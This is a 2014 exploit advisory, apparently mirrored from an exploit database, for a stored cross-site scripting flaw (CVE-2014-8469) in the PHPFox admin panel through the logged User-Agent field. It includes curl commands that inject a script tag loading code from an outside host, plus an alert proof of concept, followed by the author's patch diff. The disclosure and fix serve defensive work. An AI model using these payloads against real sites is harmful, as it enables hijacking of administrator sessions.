Skip to content
cyberexploits
webappphptext

PHPFox - Persistent Cross-Site Scripting

PHPFox - Persistent Cross-Site Scripting

Published on 2014-11-17

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/35274.txt7eac4c3a
raw
# Exploit Title: PHPFox XSS AdminCP

# Date: 2014-10-22

# Exploit Author: Wesley Henrique Leite aka "spyk2r"

# Vendor Homepage: http://www.moxi9.com

# Version: All version

# CVE : CVE-2014-8469



# Response Vendor: fixed 2014-10-23 (to v4 Beta)



[+] DESCRIPTION



The system stores all urls accessed in a database table, below

information in the same 'phpfox_log_session'



[phpfox]> desc phpfox_log_session;

+---------------+----------------------+------+-----+---------+-------+

|       Field         | Type         | Null | Key | Default | Extra |

+---------------+----------------------+------+-----+---------+-------+

++++++++++ more values and

| user_agent  | varchar(100)  | NO   |       | NULL    |       |

+---------------+----------------------+------+-----+---------+-------+



the column that can be manipulated is:

-> user_agent (100)



all acess store in the system, such as bots and users wandering around the

web site, can be seen in:



AdminCP

TOOLS > Online > Guests/Boots



Output

| IP ADDRESS   | User-Agent    |   ...



knowing this, the following code was created to inject a script into the

AdminCP with User-Agent.



$ curl -A "<script src='http://www.example.com/script.js'></script>" \

 http://www.meusite.com.br/



OR



$ curl -A "<script>alert(1);</script>" http://www.meusite.com.br/



when any user with administrative access in.

'AdminCP'

TOOLS > Online > Guests/Boots



we have the script running in the administrative area.





[+] My Solution



   (line 1.8)



     1.1 --- a/module/core/template/default/controller/admincp/online-guest.html.php

Tue Oct 21 10:00:11 2014 -0200

     1.2 +++ b/module/core/template/default/controller/admincp/online-guest.html.php

Tue Oct 21 12:28:39 2014 -0200

     1.3 @@ -25,7 +25,7 @@

     1.4  {foreach from=$aGuests key=iKey item=aGuest}

     1.5   <tr class="checkRow{if is_int($iKey/2)} tr{else}{/if}">

     1.6   <td><a href="{url link='admincp.core.ip'

search=$aGuest.ip_address_search}" title="{phrase

var='admincp.view_all_the_activity_from_this_ip'}">{$aGuest.ip_address}</a></td>

     1.7 - <td>{$aGuest.user_agent}</td>

     1.8 + <td>{$aGuest.user_agent|strip_tags}</td>

     1.9   <td class="t_center">

    1.10   <div class="js_item_is_active"{if !$aGuest.ban_id}

style="display:none;"{/if}>

    1.11   <a href="#?call=ban.ip&ip={$aGuest.ip_address}&active=0"

class="js_item_active_link" title="{phrase var='admincp.unban'}">{img

theme='misc/bullet_green.png' alt=''}</a>

    1.12 @@ -43,4 +43,4 @@

    1.13  <div class="extra_info">

    1.14   {phrase var='admincp.no_guests_online'}

    1.15  </div>

    1.16 -{/if}

    1.17 \ No newline at end of file

    1.18 +{/if}

View on GitHub